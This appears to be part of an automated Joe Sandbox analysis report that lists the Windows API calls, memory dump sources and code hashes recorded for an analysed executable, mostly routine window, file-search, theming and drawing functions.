• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
• Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
• Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 0048397A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
• Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
• Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
• FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
• Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
• Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 004241E4
• SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
  • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,020A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
• SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$ActiveFocusIconicShow
• String ID:
• API String ID: 649377781-0
• Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
• Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
• Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
• Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
• Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
• Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
• Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
• Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 0042419B
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                                                                                                                                    • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2671590913-0
                                                                                                                                                                                                                                  • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                                                                                                                  • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                                                                                                                  • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                                                                                                                  • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CryptFour
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2153018856-0
                                                                                                                                                                                                                                  • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                                                                                                                  • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
• Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.3180893204.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.3180366500.0000000010000000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000E.00000002.3181831800.0000000010002000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
• Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.3180893204.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000E.00000002.3180366500.0000000010000000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000E.00000002.3181831800.0000000010002000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_10000000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
• Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
• Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
• Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0041CA40
• CreateCompatibleDC.GDI32(?), ref: 0041CA4C
• CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
• CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
• SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
• FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
• SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
• SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
• PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
• CreateCompatibleDC.GDI32(?), ref: 0041CB2B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
